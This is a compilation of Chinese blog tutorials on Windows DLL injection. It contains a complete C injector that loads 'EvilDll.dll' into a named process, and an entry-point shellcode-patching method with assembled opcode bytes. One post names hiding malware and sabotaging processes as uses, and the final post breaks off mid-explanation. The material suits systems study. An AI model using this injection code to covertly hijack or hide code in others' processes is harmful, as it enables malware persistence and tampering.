dll注入

所謂DLL 注入就是將一個(gè)DLL放進(jìn)某個(gè)進(jìn)程的地址空間里，讓它成為那個(gè)進(jìn)程的一部分。要實(shí)現(xiàn)DLL注入，首先需要打開(kāi)目標(biāo)進(jìn)程。
中文名 dll注入 外文名 hRemoteProcess 意 ? ?義 將一個(gè)DLL放進(jìn)進(jìn)程的地址空間里 方 ? ?法 打開(kāi)目標(biāo)進(jìn)程
例：
hRemoteProcess = OpenProcess(　PROCESS_CREATE_THREAD | //允許遠(yuǎn)程創(chuàng)建線程
PROCESS_VM_OPERATION　| //允許遠(yuǎn)程VM操[2] ?作
PROCESS_VM_WRITE,　//允許遠(yuǎn)程VM寫(xiě)
FALSE, dwRemoteProcessId )
由于我們后面需要寫(xiě)入遠(yuǎn)程進(jìn)程的內(nèi)存地址空間并建立遠(yuǎn)程線程，所以需要申請(qǐng)足夠的權(quán)限（PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE）。
如果進(jìn)程打不開(kāi)，以后的操作就別想了。進(jìn)程打開(kāi)后，就可以建立遠(yuǎn)線程了，不過(guò)別急，先想想這個(gè)遠(yuǎn)線程的線程函數(shù)是什么？我們的目的是注入一個(gè)DLL。而且我們知道用LoadLibrary可以加載一個(gè)DLL到本進(jìn)程的地址空間。于是，自然會(huì)想到如果可以在目標(biāo)進(jìn)程中調(diào)用LoadLibrary，不就可以把DLL加載到目標(biāo)進(jìn)程的地址空間了嗎？對(duì)！就是這樣。遠(yuǎn)線程就在這兒用了一次，建立的遠(yuǎn)線程的線程函數(shù)就是LoadLibrary，而參數(shù)就是要注入的DLL的文件名。(這里需要自己想一想，注意到了嗎，線程函數(shù)ThreadProc和LoadLibrary函數(shù)非常相似，返回值，參數(shù)個(gè)數(shù)都一樣) 還有一個(gè)問(wèn)題，LoadLibrary這個(gè)函數(shù)的地址在哪兒？也許你會(huì)說(shuō)，這個(gè)簡(jiǎn)單，GetProcAddress就可以得出。于是代碼就出來(lái)了。
char *pszLibFileRemote="my.dll";
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32"), "LoadLibraryA");
CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
但是不對(duì)！不要忘了，這是遠(yuǎn)線程，不是在你的進(jìn)程里，而pszLibFileRemote指向的是你的進(jìn)程里的數(shù)據(jù)，到了目標(biāo)進(jìn)程，這個(gè)指針都不知道指向哪兒去了，同樣pfnStartAddr這個(gè)地址上的代碼到了目標(biāo)進(jìn)程里也不知道是什么了，不知道是不是你想要的LoadLibraryA了。但是，問(wèn)題總是可以解決的，Windows有些很強(qiáng)大的API函數(shù)，他們可以在目標(biāo)進(jìn)程里分配內(nèi)存，可以將你的進(jìn)程中的數(shù)據(jù)拷貝到目標(biāo)進(jìn)程中。因此pszLibFileRemote的問(wèn)題可以解決了。
char *pszLibFileName="my.dll";//注意，這個(gè)一定要是全路徑文件名，除非它在系統(tǒng)目錄里；原因大家自己想想。
//計(jì)算DLL路徑名需要的內(nèi)存空間
int cb = (1 + lstrlenA(pszLibFileName)) * sizeof(char);
//使用VirtualAllocEx函數(shù)在遠(yuǎn)程進(jìn)程的內(nèi)存地址空間分配DLL文件名緩沖區(qū)
pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
//使用WriteProcessMemory函數(shù)將DLL的路徑名復(fù)制到遠(yuǎn)程進(jìn)程的內(nèi)存空間
iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
OK，現(xiàn)在目標(biāo)進(jìn)程也認(rèn)識(shí)pszLibFileRemote了，但是pfnStartAddr好像不好辦，我怎么可能知道LoadLibraryA在目標(biāo)進(jìn)程中的地址呢？其實(shí)Windows為我們解決了這個(gè)問(wèn)題，LoadLibraryA這個(gè)函數(shù)是在Kernel32.dll這個(gè)核心DLL里的，而這個(gè)DLL很特殊，不管對(duì)于哪個(gè)進(jìn)程，Windows總是把它加載到相同的地址上去。因此你的進(jìn)程中LoadLibraryA的地址和目標(biāo)進(jìn)程中LoadLibraryA的地址是相同的(其實(shí)，這個(gè)DLL里的所有函數(shù)都是如此)。至此，DLL注入結(jié)束了。
========

Dll注入經(jīng)典方法完整版

http://pnig0s1992.blog.51cto.com/393390/804484/


Pnig0s1992:算是復(fù)習(xí)了，最經(jīng)典的教科書(shū)式的Dll注入。
總結(jié)一下基本的注入過(guò)程，分注入和卸載
注入Dll：
1，OpenProcess獲得要注入進(jìn)程的句柄
2，VirtualAllocEx在遠(yuǎn)程進(jìn)程中開(kāi)辟出一段內(nèi)存，長(zhǎng)度為strlen(dllname)+1;
3，WriteProcessMemory將Dll的名字寫(xiě)入第二步開(kāi)辟出的內(nèi)存中。
4，CreateRemoteThread將LoadLibraryA作為線程函數(shù)，參數(shù)為Dll的名稱，創(chuàng)建新線程
5，CloseHandle關(guān)閉線程句柄
卸載Dll：
1，CreateRemoteThread將GetModuleHandle注入到遠(yuǎn)程進(jìn)程中，參數(shù)為被注入的Dll名
2，GetExitCodeThread將線程退出的退出碼作為Dll模塊的句柄值。
3，CloseHandle關(guān)閉線程句柄
3，CreateRemoteThread將FreeLibraryA注入到遠(yuǎn)程進(jìn)程中，參數(shù)為第二步獲得的句柄值。
4，WaitForSingleObject等待對(duì)象句柄返回
5，CloseHandle關(guān)閉線程及進(jìn)程句柄。

#include <stdio.h> #include <Windows.h> #include <TlHelp32.h> DWORD getProcessHandle(LPCTSTR lpProcessName)//根據(jù)進(jìn)程名查找進(jìn)程PID { DWORD dwRet = 0; HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if(hSnapShot == INVALID_HANDLE_VALUE) { printf("\n獲得進(jìn)程快照失敗%d",GetLastError()); return dwRet; } PROCESSENTRY32 pe32;//聲明進(jìn)程入口對(duì)象 pe32.dwSize = sizeof(PROCESSENTRY32);//填充進(jìn)程入口對(duì)象大小 Process32First(hSnapShot,&pe32);//遍歷進(jìn)程列表 do { if(!lstrcmp(pe32.szExeFile,lpProcessName))//查找指定進(jìn)程名的PID { dwRet = pe32.th32ProcessID; break; } } while (Process32Next(hSnapShot,&pe32)); CloseHandle(hSnapShot); return dwRet;//返回 } INT main(INT argc,CHAR * argv[]) { DWORD dwPid = getProcessHandle((LPCTSTR)argv[1]); LPCSTR lpDllName = "EvilDll.dll"; HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwPid); if(hProcess == NULL) { printf("\n獲取進(jìn)程句柄錯(cuò)誤%d",GetLastError()); return -1; } DWORD dwSize = strlen(lpDllName)+1; DWORD dwHasWrite; LPVOID lpRemoteBuf = VirtualAllocEx(hProcess,NULL,dwSize,MEM_COMMIT,PAGE_READWRITE); if(WriteProcessMemory(hProcess,lpRemoteBuf,lpDllName,dwSize,&dwHasWrite)) { if(dwHasWrite != dwSize) { VirtualFreeEx(hProcess,lpRemoteBuf,dwSize,MEM_COMMIT); CloseHandle(hProcess); return -1; } }else { printf("\n寫(xiě)入遠(yuǎn)程進(jìn)程內(nèi)存空間出錯(cuò)%d。",GetLastError()); CloseHandle(hProcess); return -1; } DWORD dwNewThreadId; LPVOID lpLoadDll = LoadLibraryA; HANDLE hNewRemoteThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)lpLoadDll,lpRemoteBuf,0,&dwNewThreadId); if(hNewRemoteThread == NULL) { printf("\n建立遠(yuǎn)程線程失敗%d",GetLastError()); CloseHandle(hProcess); return -1; } WaitForSingleObject(hNewRemoteThread,INFINITE); CloseHandle(hNewRemoteThread); //準(zhǔn)備卸載之前注入的Dll DWORD dwHandle,dwID; LPVOID pFunc = GetModuleHandleA;//獲得在遠(yuǎn)程線程中被注入的Dll的句柄 HANDLE hThread = CreateRemoteThread(hProcess,NULL,0,(LPTHREAD_START_ROUTINE)pFunc,lpRemoteBuf,0,&dwID); WaitForSingleObject(hThread,INFINITE); GetExitCodeThread(hThread,&dwHandle);//線程的結(jié)束碼即為Dll模塊兒的句柄 CloseHandle(hThread); pFunc = FreeLibrary; hThread = CreateRemoteThread(hThread,NULL,0,(LPTHREAD_START_ROUTINE)pFunc,(LPVOID)dwHandle,0,&dwID); //將FreeLibraryA注入到遠(yuǎn)程線程中去卸載Dll WaitForSingleObject(hThread,INFINITE); CloseHandle(hThread); CloseHandle(hProcess); return 0; }
?
========

DLL注入技術(shù)

http://blog.csdn.net/chenyujing1234/article/details/7860629
轉(zhuǎn)載自： http://hi.baidu.com/xwind85/blog/item/ae5332ad04bb7f034a36d662.html

一、DLL注入技術(shù)的用途
DLL注入技術(shù)的用途是很廣泛的，這主要體現(xiàn)在：

1、假如你要操縱的對(duì)象涉及的數(shù)據(jù)不在進(jìn)程內(nèi)；

2、你想對(duì)目標(biāo)進(jìn)程中的函數(shù)進(jìn)行攔截(甚至API函數(shù)，嘿嘿，由此編寫(xiě)個(gè)攔截timeGettime的過(guò)程，變速齒輪不就出來(lái)了么？改天我試試)，比如對(duì)它所屬窗口進(jìn)行子類化。

3、你想編寫(xiě)一些函數(shù)用于增強(qiáng)或增加目標(biāo)進(jìn)程功能，比如可以給目標(biāo)進(jìn)程的某個(gè)窗口插入個(gè)消息循環(huán)增加其響應(yīng)能力。（Mfc Windows程序設(shè)計(jì)稱之為消息泵）。

4、隱藏自己的程序，很多惡意程序都是這樣做的，即使你將惡意程序的進(jìn)程結(jié)束掉也毫無(wú)意義了，因?yàn)樗约阂呀?jīng)插入到很多進(jìn)程中去了，唯一有效的辦法只有注銷windows.。如果你是個(gè)愛(ài)搞破壞的人就更應(yīng)該掌握該技術(shù)了，不但可以利用該技術(shù)實(shí)現(xiàn)隱藏自己的進(jìn)程，還可以破壞某個(gè)目標(biāo)進(jìn)程。因?yàn)閷⑵茐拇a插入到目標(biāo)進(jìn)程進(jìn)行破壞的話簡(jiǎn)直易如反掌。不信試試？:(
二、實(shí)現(xiàn)DLL注入的另一種方法
1、將DLL注入進(jìn)程技術(shù)在實(shí)現(xiàn)Api函數(shù)的監(jiān)視程序中不可缺少的一項(xiàng)工作。其中最常見(jiàn)的就是用SetWindowsHookEx函數(shù)實(shí)現(xiàn)了。不過(guò)，該方法的缺點(diǎn)是被監(jiān)視的目標(biāo)進(jìn)程必須有窗口，這樣，SetWindowsHookEx才能將DLL注入目標(biāo)進(jìn)程中。而且，目標(biāo)程序已經(jīng)運(yùn)行了，那么，在窗口創(chuàng)建之前的Api函數(shù)就不能被Hook了。
2、另外一種方法用Debug方案，就可以實(shí)現(xiàn)在程序創(chuàng)建時(shí)監(jiān)視所有的Api了，缺點(diǎn)是必須是目標(biāo)進(jìn)程的Debug源，在監(jiān)視程序終了時(shí)，目標(biāo)進(jìn)程會(huì)無(wú)條件終了。最大的缺點(diǎn)就是無(wú)法調(diào)試注入的DLL。
3、還有其他多種方案也可以實(shí)現(xiàn)DLL的注入，在《Windows核心編程》一書(shū)中就介紹了8－9種，其中有一種采用CreateProcess的方法，實(shí)現(xiàn)起來(lái)比較復(fù)雜，但沒(méi)有上面幾種方法的局限性。且可以用其他工具（VC等）調(diào)試注入的DLL。下面進(jìn)行介紹。
原理如下：
1）． 用CreateProcess（CREATE_SUSPENDED）啟動(dòng)目標(biāo)進(jìn)程。
2）． 找到目標(biāo)進(jìn)程的入口，用ImageHlp中的函數(shù)可以實(shí)現(xiàn)。
3）． 將目標(biāo)進(jìn)程入口的代碼保存起來(lái)。
4）． 在目標(biāo)進(jìn)程的入口寫(xiě)入LoadLibrary（MyDll）實(shí)現(xiàn)Dll的注入。
5）． 用ResumeThread運(yùn)行目標(biāo)進(jìn)程。
6）． 目標(biāo)進(jìn)程就運(yùn)行了LoadLibrary（MyDll），實(shí)現(xiàn)DLL的注入。
7）． 目標(biāo)進(jìn)程運(yùn)行完LoadLibrary(MyDll)后，將原來(lái)的代碼寫(xiě)回目標(biāo)進(jìn)程的入口。
8）． 目標(biāo)進(jìn)程Jmp至原來(lái)的入口，繼續(xù)運(yùn)行程序。
從原理上可以看出，DLL的注入在目標(biāo)進(jìn)程的開(kāi)始就運(yùn)行了，而且不是用Debug的方案，這樣，就沒(méi)有上面方案的局限性了。該方案的關(guān)鍵在6，7，8三步，實(shí)現(xiàn)方法需要監(jiān)視進(jìn)程和DLL合作。下面，結(jié)合代碼進(jìn)行分析。
在監(jiān)視進(jìn)程中，創(chuàng)建FileMapping，用來(lái)保存目標(biāo)進(jìn)程的入口代碼，同時(shí)保證DLL中可以訪問(wèn)。在第7步實(shí)現(xiàn)將原目標(biāo)代碼寫(xiě)回目標(biāo)進(jìn)程的入口。

// 監(jiān)視程序和DLL共用的結(jié)構(gòu)體 ?
#pragma pack (push ,1) ?// 保證下面的結(jié)構(gòu)體采用BYTE對(duì)齊（必須） ?
typedef struct ??
{ ?
? ? BYTE int_PUSHAD; ? ?// pushad 0x60 ??
? ? BYTE int_PUSH; ? ? ?// push &szDLL 0x68 ?
? ? DWORD push_Value; ? // &szDLL = "ApiSpy.dll"的path ?
? ? BYTE int_MOVEAX; ? ?// move eax &LoadLibrary 0xB8 ?
? ? DWORD eax_Value; ? ?// &LoadLibrary ?
? ? WORD call_eax; ? ? ?// call eax 0xD0FF(FF D0) (LoadLibrary("ApiSpy.dll"); ?
? ? BYTE jmp_MOVEAX; ? ?// move eax &ReplaceOldCode 0xB8 ??
? ? DWORD jmp_Value; ? ?// JMP的參數(shù) ?
? ? WORD jmp_eax; ? ? ? // jmp eax 0xE0FF(FF E0) jmp ReplaceOldCode; ?
? ? char szDLL[MAX_PATH]; // "ApiSpy.dll"的FullPath ?
}INJECT_LOADLIBRARY_CODE, *LPINJECT_CODE; ?
#pragma pack (pop , 1) ?

上面結(jié)構(gòu)體的代碼為匯編代碼，對(duì)應(yīng)的匯編為：
[cpp] view plain copy
pushad ?
push szDll ?
mov eax, &LoadLibraryA ?
call eax ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?// 實(shí)現(xiàn)調(diào)用LoadLibrary(szDll)的代碼 ?
mov eax, oldentry ?
jmp eax ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? // 實(shí)現(xiàn)在LoadLibrary運(yùn)行完后, 跳至目標(biāo)進(jìn)程的入口繼續(xù)運(yùn)行 ?
// FileMaping的結(jié)構(gòu)體 ?
typedef struct ??
{ ?
? ? LPBYTE lpEntryPoint; ? ? ? ? ? ? ? ?// 目標(biāo)進(jìn)程的入口地址 ?
? ? BYTE oldcode[sizeof(INJECT_CODE)]; ?// 目標(biāo)進(jìn)程的代碼保存 ?
}SPY_MEM_SHARE, * LPSPY_MEM_SHARE; ?


準(zhǔn)備工作：
第一步：用CreateProcess（CREATE_SUSPENDED）啟動(dòng)目標(biāo)進(jìn)程。

[cpp] view plain copy
CreateProcessA(0, szRunFile, 0, 0, FALSE, CREATE_SUSPENDED ?
0, NULL, &stInfo, ?
&m_proInfo) ; ?
用CreateProcess啟動(dòng)一個(gè)暫停的目標(biāo)進(jìn)程；
找到目標(biāo)進(jìn)程的入口點(diǎn)，函數(shù)如下
第二步：找到目標(biāo)進(jìn)程的入口，用ImageHlp中的函數(shù)可以實(shí)現(xiàn)。

[cpp] view plain copy
pEntryPoint = GetExeEntryPoint(szRunFile); ?
LPBYTE GetExeEntryPoint(char *filename) ?
{ ?
? ? PIMAGE_NT_HEADERS pNTHeader; ?
? ? DWORD pEntryPoint; ?
? ? PLOADED_IMAGE pImage; ?
? ? pImage = ImageLoad(filename, NULL); ?
? ? if(pImage == NULL) ?
? ? ? ? return NULL; ?
? ? pNTHeader = pImage->FileHeader; ?
? ? pEntryPoint = pNTHeader->OptionalHeader.AddressOfEntryPoint + pNTHeader->OptionalHeader.ImageBase; ?
? ? ImageUnload(pImage); ?
? ? return (LPBYTE)pEntryPoint; ?
} ?

// 創(chuàng)建FileMapping

[cpp] view plain copy
hMap = CreateFileMapping((HANDLE)0xFFFFFFFF, NULL, ?
PAGE_READWRITE, 0, sizeof(SPY_MEM_SHARE), “MyDllMapView”); ?

// 保存目標(biāo)進(jìn)程的代碼
第三步：將目標(biāo)進(jìn)程入口的代碼保存起來(lái)。
[cpp] view plain copy
LPSPY_MEM_SHARE lpMap = pMapViewOfFile(hMap, FILE_MAP_ALL_ACCESS,0, 0, 0); ?
ReadProcessMemory(m_proInfo.hProcess, pEntryPoint,&lpMap->oldcode, sizeof(INJECT_CODE),&cBytesMoved); ?
lpMap->lpEntryPoint = pEntryPoint; ?
// 第四步：在目標(biāo)進(jìn)程的入口寫(xiě)入LoadLibrary（MyDll）實(shí)現(xiàn)Dll的注入。
// 準(zhǔn)備注入DLL的代碼
[cpp] view plain copy
INJECT_CODE newCode; ?
// 寫(xiě)入MyDll―――用全路徑 ?
lstrcpy(newCode.szDLL, szMyDll); ?
// 準(zhǔn)備硬代碼（匯編代碼） ?
newCode.int_PUSHAD = 0x60; ??
newCode.int_PUSH = 0x68; ?
newCode.int_MOVEAX = 0xB8; ?
newCode.call_eax = 0xD0FF; ?
newCode.jmp_MOVEAX = 0xB8; ?
newCode.jmp_eax = 0xE0FF; ?
newCode.eax_Value = (DWORD)＆LoadLibrary; ?
newCode.push_Value=(pEntryPoint + offsetof(INJECT_CODE,szDLL)); ?
// 將硬代碼寫(xiě)入目標(biāo)進(jìn)程的入口 ?
// 修改內(nèi)存屬性 ?
DWORD dwNewFlg, dwOldFlg; ?
dwNewFlg = PAGE_READWRITE; ?
VirtualProtectEx(m_proInfo.hProcess, (LPVOID)pEntryPoint, sizeof(DWORD), dwNewFlg, &dwOldFlg); ?
WriteProcessMemory(m_proInfo.hProcess, pEntryPoint,&newCode, sizeof(newCode), NULL);//&dwWrited); ?
VirtualProtectEx(proInfo.hProcess, (LPVOID)pEntryPoint, sizeof(DWORD), dwOldFlg, &dwNewFlg); ?
// 釋放FileMaping 注意，不是Closehandle(hMap) ?
UnmapViewOfFile(lpMap); ?


// 繼續(xù)目標(biāo)進(jìn)程的運(yùn)行
第五步：用ResumeThread運(yùn)行目標(biāo)進(jìn)程。


[cpp] view plain copy
ResumeThread(m_proInfo.hThread); ?
在監(jiān)視進(jìn)程中就結(jié)束了自己的任務(wù)，剩下的第6，7，8步就需要在Dll的DllMain中進(jìn)行配合。
DLL中用來(lái)保存數(shù)據(jù)的結(jié)構(gòu)體
[cpp] view plain copy
typedef struct ?
{ ?
? ? DWORD lpEntryPoint; ?
? ? DWORD OldAddr; ?
? ? DWORD OldCode[4]; ? ??
}JMP_CODE,* LPJMP_CODE; ?
static JMP_CODE _lpCode; ?


// 在DllMain的DLL_PROCESS_ATTACH中調(diào)用InitApiSpy函數(shù)
// 在該函數(shù)中實(shí)現(xiàn)第6，7，8步
第六步：目標(biāo)進(jìn)程就運(yùn)行了LoadLibrary（MyDll），實(shí)現(xiàn)DLL的注入。
[cpp] view plain copy
int WINAPI DllMain(HINSTANCE hInst, DWORD dwReason, LPVOID lpReserved) ?
{ ?
switch(dwReason) ?
{ ?
case DLL_PROCESS_ATTACH: ?
? ? return InitApiSpy(); ?
? ? …… ?


// InitApiSpy函數(shù)的實(shí)現(xiàn)
[cpp] view plain copy
BOOL WINAPI InitApiSpy() ?
{ ?
? ? HANDLE hMap; ?
? ? LPSPY_MEM_SHARE lpMem; ?
? ? DWORD dwSize; ?
? ? BOOL rc; ?
? ? BYTE* lpByte; ?
? ? // 取得FileMapping的句柄 ?
? ? hMap = OpenFileMapping(FILE_MAP_ALL_ACCESS, 0, “MyDllMapView”); ?
? ? if(hMap) ?
? ? { ?
? ? ? ? lpMem = (LPSPY_MEM_SHARE)MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0, 0, 0); ?
? ? ? ? if(lpMem) ?
? ? ? ? { ?


第七步：目標(biāo)進(jìn)程運(yùn)行完LoadLibrary(MyDll)后，將原來(lái)的代碼寫(xiě)回目標(biāo)進(jìn)程的入口。
[cpp] view plain copy
BOOL WINAPI InitApiSpy() ?
{ ?
? ? HANDLE hMap; ?
? ? LPSPY_MEM_SHARE lpMem; ?
? ? DWORD dwSize; ?
? ? BOOL rc; ?
? ? BYTE* lpByte; ?
? ? // 取得FileMapping的句柄 ?
? ? hMap = OpenFileMapping(FILE_MAP_ALL_ACCESS, 0, “MyDllMapView”); ?
? ? if(hMap) ?
? ? { ?
? ? ? ? lpMem = (LPSPY_MEM_SHARE)MapViewOfFile(hMap,FILE_MAP_ALL_ACCESS,0, 0, 0); ?
? ? ? ? if(lpMem) ?
? ? ? ? { ?
??
? ? ? ? ? ? // 恢復(fù)目標(biāo)進(jìn)程的入口代碼 ?
? ? ? ? ? ? // 得到mov eax, value代碼的地址 ?
? ? ? ? ? ? _lpCode.OldAddr = (DWORD)((BYTE*)lpMem->lpEntryPoint + offsetof(INJECT_CODE, jmp_MOVEAX)); ?
? ? ? ? ? ? _lpCode.lpEntryPoint = (DWORD)lpMem->lpEntryPoint; ?
? ? ? ? ? ? // 保存LoadLibrary()后面的代碼 ?
? ? ? ? ? ? memcpy(&_lpCode.OldCode, (BYTE*)lpMem->oldcode + offsetof(INJECT_CODE, jmp_MOVEAX), 2*sizeof(DWORD)); ?
? ? ? ? ? ? // 恢復(fù)目標(biāo)進(jìn)程的入口代碼 ?
? ? ? ? ? ? rc = WriteProcessMemory(GetCurrentProcess(), lpMem->lpEntryPoint, lpMem->oldcode, sizeof(INJECT_CODE), &dwSize); ?
? ? ? ? ? ? lpByte = (BYTE*)lpMem->lpEntryPoint + offsetof(INJECT_CODE, jmp_MOVEAX); ?
? ? ? ? ? ? UnmapViewOfFile(lpMem); ?
? ? ? ? } ?
? ? ? ? CloseHandle(hMap); ?
? ? } ?
? ? // 實(shí)現(xiàn)自己Dll的其他功能，如導(dǎo)入表的替換 ?
? ? // …… ?
? ? // 將LoadLibrary后面的代碼寫(xiě)為轉(zhuǎn)入處理程序中 ?
? ? // 指令為：mov eax, objAddress ?
? ? // jmp eax ?
? ? { ?
? ? ? ? BYTE* lpMovEax; ?
? ? ? ? DWORD* lpMovEaxValu; ?
? ? ? ? WORD* lpJmp; ?
? ? ? ? DWORD fNew, fOld; ?
? ? ? ? fNew = PAGE_READWRITE; ?
? ? ? ? lpMovEax = lpByte; ?
? ? ? ? VirtualProtect(lpMovEax, 2*sizeof(DWORD), fNew, &fOld); ?
? ? ? ? *lpMovEax = 0xB8; ?
? ? ? ? lpMovEaxValu = (DWORD*)(lpMovEax + 1); ?
? ? ? ? *lpMovEaxValu = (DWORD)&DoJmpEntryPoint; ?
? ? ? ? lpJmp = (WORD*)(lpMovEax + 5); ?
? ? ? ? *lpJmp = 0xE0FF; // (FF E0) ?
? ? ? ? VirtualProtect(lpMovEax, 2*sizeof(DWORD), fOld, &fNew); ?
? ? } ?
? ? return TRUE; ?
} ?


[cpp] view plain copy
// 轉(zhuǎn)入處理程序 ?
DWORD* lpMovEax; ?
DWORD fNew, fOld; ?
void __declspec(naked) DoJmpEntryPoint () ?
{ ?
? ? // 恢復(fù)LoadLibrary后面的代碼 ?
? ? _gfNew = PAGE_READWRITE; ?
? ? _glpMovEax = (DWORD*)_lpCode.OldAddr; ?
? ? VirtualProtect(_glpMovEax, 2*sizeof(DWORD), _gfNew, &_gfOld); ?
? ? *_glpMovEax = _lpCode.OldCode[0]; ?
? ? *(_glpMovEax + 1) = _lpCode.OldCode[1]; ?
? ? VirtualProtect(_glpMovEax, 2*sizeof(DWORD), _gfOld, &_gfNew); ?
//第八步：目標(biāo)進(jìn)程Jmp至原來(lái)的入口，繼續(xù)運(yùn)行程序。 ?
// 跳至目標(biāo)代碼的入口 ?
_asm popad ?
_asm jmp _lpCode.lpEntryPoint ?
} ?


第八步：目標(biāo)進(jìn)程Jmp至原來(lái)的入口，繼續(xù)運(yùn)行程序。
[cpp] view plain copy
// 跳至目標(biāo)代碼的入口 ?
_asm popad ?
_asm jmp _lpCode.lpEntryPoint ?
} ?


這樣就實(shí)現(xiàn)了原來(lái)的目標(biāo)，將DLL的注入放在目標(biāo)進(jìn)程的入口運(yùn)行，實(shí)現(xiàn)了目標(biāo)進(jìn)程運(yùn)行之前運(yùn)行我們的注入Dll的功能。
========

Windows核心編程學(xué)習(xí)筆記遠(yuǎn)程注入DLL

http://blog.chinaunix.net/uid-26275986-id-3141902.html


遠(yuǎn)程注入DLL
一、概述
為了隱藏自身的進(jìn)程信息，我們希望將進(jìn)程作為一個(gè)合法進(jìn)程的線程運(yùn)行。由于系統(tǒng)進(jìn)程間不允許直接操作資源，因而我們需要在合法進(jìn)程內(nèi)部創(chuàng)建一個(gè)線程，為其指定要執(zhí)行的代碼。一種簡(jiǎn)單的方式是令遠(yuǎn)程線程載入一個(gè)我們編寫(xiě)的DLL，通過(guò)DllMain()函數(shù)執(zhí)行我們需要的代碼。基本思路是將LoadLibrary()函數(shù)作為一個(gè)線程函數(shù)來(lái)調(diào)用：
CreateRemoteThread()---->LoadLibrary()---->DllMain()
這里的核心函數(shù)是CreateRemoteThread()，它用來(lái)在遠(yuǎn)程進(jìn)程中創(chuàng)建一新線程。我們來(lái)看一下這個(gè)函數(shù)：
HANDLE WINAPI CreateRemoteThread(
? ? HANDLE hProcess, //要?jiǎng)?chuàng)建遠(yuǎn)程線程的進(jìn)程句柄
? ? LPSECURITY_ATTRIBUTES lpThreadAttributes, //用于定義新線程的安全屬性，這里設(shè)為NULL采用默認(rèn)值即可
? ? SIZE_T dwStackSize, ?//初始化線程堆棧大小，NULL為默認(rèn)大小
? ? LPTHREAD_START_ROUTINE lpStartAddress, //線程函數(shù)開(kāi)始的地址
? ? LPVOID lpParameter, ?//線程函數(shù)參數(shù)
? ? DWORD dwCreationFlags, ?//函數(shù)表示創(chuàng)建線程后線程的運(yùn)行狀態(tài)
? ? LPDWORD lpThreadId ?//返回線程ID，不關(guān)心可以設(shè)為NULL不返回
);
使用這個(gè)函數(shù)關(guān)鍵要解決三個(gè)參數(shù)問(wèn)題：
l ?獲得遠(yuǎn)程線程的進(jìn)程句柄，而且要確保相應(yīng)權(quán)限
l ?獲取遠(yuǎn)程進(jìn)程中線程函數(shù)的開(kāi)始地址，而非本地地址
l ?向遠(yuǎn)程線程成功傳入DLL路徑字符串
解決了這三個(gè)問(wèn)題，我們的遠(yuǎn)程注入DLL就基本完成了。接下來(lái)，這篇筆記的組織結(jié)構(gòu)如下：
F ?獲取遠(yuǎn)程進(jìn)程句柄
l ?枚舉系統(tǒng)進(jìn)程
l ?提升進(jìn)程權(quán)限
F ?獲取LoadLibrary()函數(shù)在遠(yuǎn)程進(jìn)程中的地址
F ?向遠(yuǎn)程線程中寫(xiě)入DLL路徑字符串
l ?利用VirtualAllocEx()分配遠(yuǎn)程地址空間
l ?利用WriteProcessMemory()寫(xiě)入遠(yuǎn)程地址空間
F ?程序源碼
F ?運(yùn)行測(cè)試?


二、獲取遠(yuǎn)程進(jìn)程句柄
我們主要利用OpenProcess()函數(shù)來(lái)獲得要注入的進(jìn)程的句柄，句柄是系統(tǒng)中可以起到唯一標(biāo)識(shí)作用的一個(gè)對(duì)象。我們來(lái)看一下OpenProcess()函數(shù)：
HANDLE WINAPI OpenProcess(
? ? DWORD dwDesiredAccess, ?//獲取的句柄的訪問(wèn)權(quán)限
? ? BOOL bInheritHandle, ? ?//是否可為新進(jìn)程繼承
? ? DWORD dwProcessId ? ? ? //要獲取句柄的進(jìn)程ID
);
句柄的訪問(wèn)權(quán)限是指我們要使用該進(jìn)程的句柄做哪些訪問(wèn)操作，對(duì)于遠(yuǎn)程注入DLL來(lái)說(shuō)，主要有：
PROCESS_CREATE_THREAD | ?//For CreateRemoteThread()
PROCESS_VM_OPERATION | ?//For VirtualAllocEx()/VirtualFreeEx()
PROCESS_VM_WRITE ? ? ? //For WriteProcessMemory(0
當(dāng)然，我們也可以直接設(shè)為最高權(quán)限：PROCESS_ALL_ACCESS。
第二個(gè)參數(shù)說(shuō)明了是否可為新進(jìn)程繼承，第三個(gè)參數(shù)需要借助我們編寫(xiě)的子函數(shù)ListProcess()來(lái)獲得。另外需要注意的是，對(duì)于很多系統(tǒng)和服務(wù)進(jìn)程而言，獲取其帶有寫(xiě)權(quán)限的句柄需要主調(diào)進(jìn)程擁有調(diào)試權(quán)限，我們利用子函數(shù)EnableDebugPriv()來(lái)提升權(quán)限。這樣在XP下就足夠了，在VISTA之后的系統(tǒng)中需要進(jìn)一步提升另一個(gè)隱藏權(quán)限，這里只討論在XP上的情況。
l ?ListProcess()
我們使用ToolHelpAPI獲取當(dāng)前運(yùn)行程序的信息，從而編寫(xiě)適合自己需要的工具（@MSDN）。它支持的平臺(tái)比較廣泛，可以在 Windows CE 下使用。在 Windows Mobile SDK 的 Samples 里面有一個(gè) PViewCE 的樣例程序，就是用這個(gè)來(lái)查看進(jìn)程和線程信息的。
使用方法就是先用 CreateToolhelp32Snapshot 將當(dāng)前系統(tǒng)的進(jìn)程、線程、DLL、堆的信息保存到一個(gè)緩沖區(qū)，這就是一個(gè)系統(tǒng)快照。如果你只是對(duì)進(jìn)程信息感興趣，那么只要包含 TH32CS_SNAPPROCESS 標(biāo)志即可。 常見(jiàn)標(biāo)志如下：
TH32CS_SNAPHEAPLIST：列舉th32ProcessID指定進(jìn)程中的堆
TH32CS_SNAPMODULE：列舉th32ProcessID指定進(jìn)程中的模塊
TH32CS_SNAPPROCESS：列舉系統(tǒng)范圍內(nèi)的所有進(jìn)程
TH32CS_SNAPTHREAD：列舉系統(tǒng)范圍內(nèi)的所有線程
函數(shù)執(zhí)行成功返回快照句柄，否則返回INVALID_HANDLE_VALUE。
